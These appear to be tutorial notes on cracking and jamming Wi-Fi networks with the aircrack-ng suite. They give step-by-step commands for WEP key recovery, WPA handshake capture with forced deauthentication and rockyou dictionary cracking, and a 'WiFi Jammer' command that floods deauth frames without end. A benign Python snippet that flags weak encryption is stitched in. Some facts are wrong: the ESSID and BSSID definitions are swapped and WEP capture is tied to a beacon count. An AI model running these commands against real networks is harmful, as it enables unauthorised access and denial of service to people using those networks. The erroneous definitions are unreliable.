- ==========================================
- CAPTURING WIRELESS COMMUNICATION PACKETS
- ==========================================
- Attacker’s Machine - Kali OS
- Device Used - Leoxsys External WIFI Adapter (LEO-HG150N)
- Tool - Airmon-ng, Airodump-ng (Non-Graphical)
- Modes of Using a Wireless Adapter :
- # Standard Mode : The mode used by everyone to connect to and use the services of a particular Access Point.
- # Monitor Mode : The mode which allows a system with a wireless network interface controller to capture all traffic received from the wireless network, not only the frames addressed to it.
- Command: iwconfig --> to check which mode the Wi-Fi adapter is currently in
- Tools we will be encountering are :
- * Airmon-ng : A tool which puts our wireless card into promiscuous mode. Yes, that means that our wireless card will hook up with anyone!
- Well, that's almost correct. When our network card is in promiscuous mode, it can see and receive all network traffic. Generally, network cards will only receive packets intended for them (as determined by the MAC address of the NIC), but with airmon-ng it will receive all wireless traffic, whether intended for us or not.
- Commands:
- # iwconfig
- # airmon-ng start wlan0
- # kill <PID> (processes that might interfere with monitor mode)
- * Airodump-ng : A tool which enables us to capture packets of our specification. This will show us some more information about a particular wireless network. So let's discuss some of the keywords.
- Commands:
- # airodump-ng wlan0mon
- Terminologies
- ==============
- Beacons : Number of beacons sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far.
- #Data : Number of captured data packets, including data broadcast packets.
- #s : Number of data packets per second measured over the last 10 seconds.
- CH : Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference.
- MB : Maximum speed supported by the AP.
- ENC : Encryption algorithm in use. OPN = no encryption, "WEP?" = WEP or higher (not enough data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP or MGT is present.
- CIPHER : The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2.
- AUTH : The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2).
- WPS : This is only displayed when --wps (or -W) is specified. If the AP supports WPS, the first field of the column indicates version supported.
- ESSID : The MAC / Physical Address of the Access Point.
- BSSID : Name of the Access Point.
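The same columns can be read back from the CSV that airodump-ng writes next to the .cap file (the `-w` prefix plus `-01.csv`). The following is an added defender-side example, not part of the original notes: it parses a constructed sample in that layout and flags access points whose ENC / CIPHER / AUTH values indicate a weak setup, which is what a wireless audit report needs from the capture. The column order and the blank line separating the AP section from the station section are assumed from airodump-ng's CSV output.

```python
import csv

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv.
# Column order is assumed; the station section after the blank line is ignored.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,   7, HomeNet,
AA:BB:CC:00:00:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WEP, WEP, SKA, -55,       90,     3000,   0.  0.  0.  0,   9, OldRouter,
AA:BB:CC:00:00:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, OPN,  , , -70,       30,        0,   0.  0.  0.  0,   9, CafeGuest,
AA:BB:CC:00:00:04, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  3,  54, WPA, TKIP, PSK, -60,       50,        0,   0.  0.  0.  0,   6, Legacy,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DD:EE:FF:00:00:01, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -50,       40, AA:BB:CC:00:00:01,
"""


def parse_access_points(text):
    """Return one dict per row of the AP section (header names as keys)."""
    ap_lines = []
    for line in text.strip().splitlines():
        if not line.strip():          # AP section ends at the first blank line
            break
        ap_lines.append(line)
    reader = csv.reader(ap_lines, skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    aps = []
    for row in reader:
        if len(row) < len(header):    # skip truncated rows (file still being written)
            continue
        aps.append({h: v.strip() for h, v in zip(header, row)})
    return aps


def weak_encryption_findings(aps):
    """Map ESSID -> reason for every AP whose ENC/CIPHER/AUTH columns are weak."""
    findings = {}
    for ap in aps:
        privacy, cipher, auth = ap["Privacy"], ap["Cipher"], ap["Authentication"]
        if privacy == "OPN":
            findings[ap["ESSID"]] = "no encryption (OPN)"
        elif privacy.startswith("WEP"):       # covers both "WEP" and "WEP?"
            findings[ap["ESSID"]] = "WEP: recoverable from captured IVs"
        elif auth == "SKA":
            findings[ap["ESSID"]] = "shared-key authentication"
        elif cipher == "TKIP":
            findings[ap["ESSID"]] = "WPA with TKIP (deprecated cipher)"
    return findings


if __name__ == "__main__":
    for essid, reason in weak_encryption_findings(parse_access_points(SAMPLE_CSV)).items():
        print(f"{essid}: {reason}")
```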
- WEP
- ===
- #iwconfig
- #airmon-ng
- #airmon-ng start wlan0
- #iwconfig
- #airodump-ng wlan0mon
- Note the target's BSSID and channel number from the list
- #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <Capture file prefix, here aranjit> wlan0mon
- Wait until the number of beacons reaches 25,000
- #aircrack-ng aranjit-01.cap
- WPA|WPA2
- ========
- When there is a new device connecting
- -------------------------------------
- #iwconfig
- #airmon-ng
- #airmon-ng start wlan0
- #iwconfig
- #airodump-ng wlan0mon
- Note the target's BSSID and channel number from the list
- #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <Capture file prefix, here aranjit> wlan0mon
- This will capture the WPA handshake
- #aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap
- When there is no new device connecting
- -------------------------------------
- #iwconfig
- #airmon-ng
- #airmon-ng start wlan0
- #iwconfig
- #airodump-ng wlan0mon
- Note the target's BSSID and channel number from the list
- #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <Capture file prefix, here aranjit> wlan0mon
- This will capture the WPA handshake
- #aireplay-ng -0 10 -a <Router's BSSID> -s <Station's BSSID> wlan0mon
- This lets us capture the handshake
- #aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap
- WiFi Jammer
- ===========
- #aireplay-ng -0 0 -a <Router's BSSID> -s FF:FF:FF:FF:FF:FF wlan0mon